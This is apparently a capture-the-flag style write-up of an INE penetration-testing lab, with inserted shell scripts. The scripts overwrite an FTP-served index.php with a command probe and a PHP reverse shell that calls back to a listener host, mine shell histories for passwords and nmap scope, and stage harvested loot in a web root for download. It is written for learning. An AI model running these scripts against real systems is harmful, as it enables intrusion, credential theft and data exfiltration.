Special Thanks to:
INE Legacyy
Introduction
Hello Friends! Welcome back; today we have been contracted by INE to perform an assessment of their network. As INE wanted a black-box test, 7R!XxSec was provided with very little information going in. The engagement letter stated as follows:
“You have been engaged in a Black-box Penetration Test (172.16.37.0/24 range). Your goal is to read the flag file on each machine. On some of them, you will be required to exploit a remote code execution vulnerability in order to read the flag”
And as such, we entered into the engagement with the following assumptions:
- There are multiple machines on the network
- Full control is not the aim, success is the capturing of the flag
Attack Narrative
Beginning with a network scan, we discovered two machines with attack surfaces.
Let's grab a port scan of .220
Okay, a webserver and a second port that refuses our service-identification attempts, although its number suggests a SQL server. Heading out to the website we find nothing, but a check of the page source reveals some useful network information indicating that this machine is dual-homed, meaning there is an internal network we do not yet have visibility on.
Dirsearching on the root reveals a subdirectory, but access to it is forbidden.
Some Searchsploiting turns up Optionsbleed (CVE-2017-9798) as a potential vulnerability to attack the Apache service with, but the Metasploit Optionsbleed scanner shows that the conditions for this exploit are not in place (it needs an .htaccess that uses the Limit directive with an invalid HTTP method). Seems like we are at a dead end on this machine. Let's go take a peek at the other machine we found in our host scan.
Looks like we have a second webserver, and also an FTP server! I love a good exposed FTP server ./fistpump but let’s take a look at the website first.
Nothing on the index page, but a Dirsearch reveals an exposed subdirectory whose page shows what appears to be the output of an ifconfig command being executed server-side.
Other than this there is not much else to play with here, let’s go back and check out that FTP server.
Immediate win here: after a couple of oblivious attempts the message finally becomes clear: the FTP banner gives both the username and password for this service.
Some light enumeration reveals a delicious secret: the PHP index page for the machine's webserver is being served from this FTP server, meaning the FTP root overlaps the web root. Furthermore, the directory containing this file is world-writable (777).
This is very good for us if it is what we think it is, so let's run a quick test to make sure. We copy this index.php file down, replace the command it calls, put our version in place of the FTP original, and request the webpage to see whether it runs our new command.
Alright! Rock on dudes! Let's bust into this thing! We can find a PHP reverse shell here, which we customize with our listener address and port, name index.php, put in place on the FTP server, and then catch the callback with a NetCat listener when the page is refreshed!
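The whole loop above, scripted in POSIX shell as an added example (this is not the author's command history, and the minimal PHP connect-back below stands in for the reverse shell the write-up links): back up the served index.php over FTP, upload a probe that runs one command between known markers, fetch the page and pull only that command's output out of the HTML, then upload the reverse shell. The target address, FTP credentials, listener address and the remote path index.php are placeholders for values that, in the engagement, came from the banner and the FTP enumeration.

```shell
#!/bin/sh
# Added example: confirm RCE through an FTP-writable web root, then replace the
# probe with a reverse shell. Target, credentials and paths are placeholders.

MARK_BEGIN='__RCE_BEGIN__'
MARK_END='__RCE_END__'

# PHP probe: runs one command and fences its output with markers so our output
# can be separated from whatever else the page renders.
make_probe_php() {
    printf '<?php echo "%s\\n"; system(%s); echo "\\n%s\\n"; ?>\n' \
        "$MARK_BEGIN" "'$1'" "$MARK_END"
}

# Print only the lines between the markers from a fetched page read on stdin.
extract_probe_output() {
    awk -v b="$MARK_BEGIN" -v e="$MARK_END" '
        index($0, e) { on = 0 }
        on           { print }
        index($0, b) { on = 1 }
    '
}

# Minimal stand-in for a PHP reverse shell: connect back to the listener and
# hand the socket to an interactive /bin/sh as its stdin, stdout and stderr.
make_reverse_shell_php() {
    printf '<?php $s=fsockopen("%s", %s); $p=proc_open("/bin/sh -i", array(0=>$s, 1=>$s, 2=>$s), $pipes); proc_close($p); ?>\n' \
        "$1" "$2"
}

# Overwrite a file on the FTP server, keeping one copy of the original so the
# page can be restored after the engagement. curl speaks FTP natively.
replace_via_ftp() {
    ftp_host=$1; ftp_user=$2; ftp_pass=$3; remote_path=$4; local_file=$5
    [ -e "$remote_path.orig" ] || \
        curl -sS "ftp://$ftp_user:$ftp_pass@$ftp_host/$remote_path" -o "$remote_path.orig"
    curl -sS -T "$local_file" "ftp://$ftp_user:$ftp_pass@$ftp_host/$remote_path"
}

# Only runs when a target is given, e.g.
#   RCE_TARGET=10.0.0.9 FTP_USER=u FTP_PASS=p LHOST=10.0.0.5 LPORT=4444 sh rce.sh
if [ -n "${RCE_TARGET:-}" ]; then
    make_probe_php id > probe.php
    replace_via_ftp "$RCE_TARGET" "$FTP_USER" "$FTP_PASS" index.php probe.php
    echo "[*] probe output (expect a uid= line):"
    curl -s "http://$RCE_TARGET/" | extract_probe_output
    make_reverse_shell_php "$LHOST" "$LPORT" > shell.php
    replace_via_ftp "$RCE_TARGET" "$FTP_USER" "$FTP_PASS" index.php shell.php
    echo "[*] run 'nc -lvnp $LPORT' on $LHOST, then request http://$RCE_TARGET/ once"
fi
```

The markers matter more than they look: the page already prints ifconfig output, so without them a probe that "worked" is hard to tell from the page's own content. Once the shell lands, put index.php.orig back over FTP so the site keeps working for everyone else on the range.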
It is a fairly trash shell, but I discovered a super cool and convenient shell upgrade thanks to ropnop’s blog, here.
Initial enumeration uncovers a very obviously interesting directory structure in elsuser’s profile:
A few nested directories down we can see there is a file called '.message', which we can assume has something to do with this exploit.
Moving along, let's snag root. It is a very simple kernel exploit that can be found here; all we did was download it, compile it, move it onto the machine in /tmp and run it. (Compile it for the target's architecture and library versions rather than trusting whatever the attack box produces, and remember that a kernel exploit that fails can panic the host, so pull off anything you still need from the box before firing it.)
With that root access we can grab the flag from a hidden file in ftpuser's directory, which turns out to be empty. Weird. A little more digging turns up the actual flag in /var/www.
Further leveraging our administrative access, we can now read the bash history, and among it:
What we see here is the developer setting up and testing the environment. He or she wanted to make sure that nmap could reach this internal network on these specific ports, so it is convenient to simply reuse this Nmap command rather than scanning everything. Scanning everything would still be best practice, but in this particular environment I would feel safe going with the assumption. Conveniently, the developer also did not uninstall Nmap, so we can use the existing installation rather than the static copy we brought over with our toolset. Using the developer's command with the developer's tool, we discover the following:
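Before moving on from the history file, an added example (not from the write-up) of doing the same thing deliberately rather than by eye: once root, collect every shell history on the box, surface the lines a tester cares about (recon, remote logins, passwords passed on the command line), and extract the target/port scope from any nmap invocation so it can be reused verbatim, as the write-up does. The history lines in SAMPLE_HISTORY are constructed for the example; the hostnames and credentials in them are made up.

```shell
#!/bin/sh
# Added example: mine shell history for recon and credential leaks once we have
# root. The sample history below is constructed, not the one from the write-up.

SAMPLE_HISTORY='ls -la /var/www/html
apt-get install nmap
nmap -p 21,22,80,3306 172.16.50.0/24
mysql -u webapp -pW3bapp!
ssh deploy@172.16.50.224
vi /var/www/html/index.php'

# Lines a pentester wants to see first: network recon, remote logins, and
# commands that took a password on the command line.
interesting_history() {
    grep -E -i -e '^(sudo )?(nmap|masscan|ssh|scp|sftp|mysql|psql|curl|wget)' \
               -e ' -p[[:graph:]]| --password|passwd'
}

# Pull "<target> <ports>" out of each nmap invocation so the scope the
# developer already validated can be reused ("-" where a part is absent).
nmap_scope() {
    awk '
        $1 == "nmap" || $2 == "nmap" {
            ports = "-"; target = "-"
            for (i = 1; i <= NF; i++) {
                if ($i == "-p" && i < NF)   ports = $(i + 1)
                else if ($i ~ /^-p[0-9]/)   ports = substr($i, 3)
                else if ($i ~ /^[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+(\/[0-9]+)?$/) target = $i
            }
            print target, ports
        }'
}

# Every shell/db history file under the usual home directories; as root that
# is all of them (paths with spaces are not handled, which is fine on a lab box).
find_history_files() {
    find /root /home -maxdepth 2 -name '.*_history' 2>/dev/null
}

# Only runs when asked: HISTORY_SCAN=1 sh history.sh
if [ -n "${HISTORY_SCAN:-}" ]; then
    for f in $(find_history_files); do
        echo "== $f"; interesting_history < "$f"
        echo "-- nmap scope:"; nmap_scope < "$f"
    done
fi
```

Run against the constructed sample, interesting_history returns the nmap, mysql and ssh lines and nmap_scope prints "172.16.50.0/24 21,22,80,3306". The mysql line is the kind of thing to look for: a password on the command line ends up in history and in the process list, and it is usually reused on the internal side.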
Before we make a move here, let's talk exfiltration quickly. This machine is set up beautifully for exfil, and there are several very simple ways of retrieving whatever data we harvest. Run 'mkdir loot' wherever you like and pipe harvested data into that directory. Whenever you're ready, move the directory into /var/www/html/xyz; then hop back onto the attack machine and pull it down either via the FTP server or through the web browser:
The object shown in the picture is some FTP source code that may be more interesting if we were more stuck than we are, but as we have rooted this box this is fairly irrelevant at this point.
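An added example of the staging step just described, written to cover the two things the quick version skips: an integrity check, and cleaning up afterwards. This is not the author's script; /var/www/html/xyz is the staging path from the write-up, and the loot paths in the usage comment are placeholders. Whatever lands in that web root is readable by anyone on the range who finds the URL or the FTP banner, so the archive is removed as soon as the downloaded copy's hash matches.

```shell
#!/bin/sh
# Added example: bundle harvested files, record a checksum before staging them
# in the web root, verify the copy pulled down on the attack box, then clean up.

sha256() {
    if command -v sha256sum >/dev/null 2>&1; then sha256sum "$1" | cut -d' ' -f1
    else shasum -a 256 "$1" | cut -d' ' -f1; fi
}

# tar+gzip the loot dir into $2 and print the archive's SHA-256 so it can be
# copied into the engagement notes and compared after download.
pack_loot() {
    loot_dir=$1; archive=$2
    tar -czf "$archive" -C "$(dirname "$loot_dir")" "$(basename "$loot_dir")"
    sha256 "$archive"
}

# Drop the archive into the served directory; 0644 keeps it web-readable.
stage_loot() {
    archive=$1; stage_dir=$2
    mkdir -p "$stage_dir" && cp "$archive" "$stage_dir/" \
        && chmod 0644 "$stage_dir/$(basename "$archive")"
}

# Compare a downloaded copy against the recorded hash; non-zero on mismatch.
verify_loot() {
    [ "$(sha256 "$1")" = "$2" ]
}

# Remove the staged copy once the hash matched: loot left in a world-readable
# web root is loot for whoever else finds it.
unstage_loot() {
    rm -f "$2/$(basename "$1")"
}

# Usage on the compromised host (placeholder paths):
#   pack_loot /tmp/loot /tmp/loot.tgz        # prints the hash
#   stage_loot /tmp/loot.tgz /var/www/html/xyz
# On the attack box:
#   curl -sO http://TARGET/xyz/loot.tgz && verify_loot loot.tgz <hash> && echo ok
# then back on the host: unstage_loot /tmp/loot.tgz /var/www/html/xyz
```

If the loot contains credentials or customer data, encrypt the archive before staging it (e.g. with a symmetric passphrase) rather than relying on an obscure directory name; a 777 web root served over anonymous-ish FTP is exactly the kind of place a second tester, or the client, stumbles into.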
Now, a quick aside. This is a prime example of the frustration and redundancy of hacking... Perhaps more so of learning to hack than of hacking itself... Regardless, when reading the instructions for this engagement it clearly described an internal network, and also suggested that a pivot would be required. When running through here I decided to trust those instructions, and I wallowed in the mud for literally a week trying to pivot into a deeper set of machines. Now, it's not that there isn't an internal network, and it's not that a pivot can't be used, so it's not exactly like they lied about it all. The only thing is that my expectation of a pivot was that there would be more machines... And I thought I had found them! I will also point out that this is as much due to my lack of experience as it is due to my higher expectations coming in, but I went for a week (a couple of hours a day) bouncing back and forth between four machines, wondering just #wtf was going on here, because I was finding my own relics in novel machines, and some had strikingly similar directory structures to others, and most of the time I was 'ip a'ing between every command because I was so confused about which box I was even in anymore! Now this week of ./flailing was not pointless; it taught me a great deal of lessons to add to my repertoire of initial enumeration, and I will now more readily be able to identify a similar situation in the future. To share a bit of my mental process I'll share a few pictures here before I explain and we perform the final few commands for this network.
I had been visually mapping the network from the first scan, and it looked like:
Then the internal network was discovered
Then more internal network
and this is where the roadblock occurred. I spent six days sitting on 172.16.37.234, trying to pivot onto 172.16.50.224. I tried a Metasploit pivot, a Chisel pivot, a browser proxy pivot, an Sshuttle pivot (though I spent most of my time trying to load static SSH services onto the machine ./sigh), and then a Metasploit pivot again! Something just wasn't quite right. So after six days of this frustration I pivoted my attention to the other discovered internal box, got into it, and was even more confused!
#blessings to Legacyy here because although the real answer was not as advanced as his thoughts, his thoughts nonetheless were the first indication I’d had in a week that I may not be a complete bumbling moron.
It was shortly after this exchange that I discovered the true truth:
Both external boxes were dual-homed to the internal network, and that's all there was here. So in a classic 7R!XxSec moment I realized that the six days I spent trying to hop from 172.16.37.234 onto 172.16.50.224 were actually six days of me trying to log into a box from a position of already being root on it.
End aside.
So here we are, sitting in the dual-homed 'machine one' and looking to get into the dual-homed 'machine two', whose external-facing IP was a brick wall of a website (this is the very first machine we enumerated), but which we now have access to through its internal side. Now pay close attention, because this exploit is about to get pretty wild:
Blam! Nailed it! Great work team! That is that in this network. After hitting here, still under the assumption that there were additional machines which were purely internal I did run some scans to check it out, but nothing came up, so #straightWins.
Thanks for hanging out with me today, and I look forward to our next adventure together!
Happy Hacking,
7R!Xx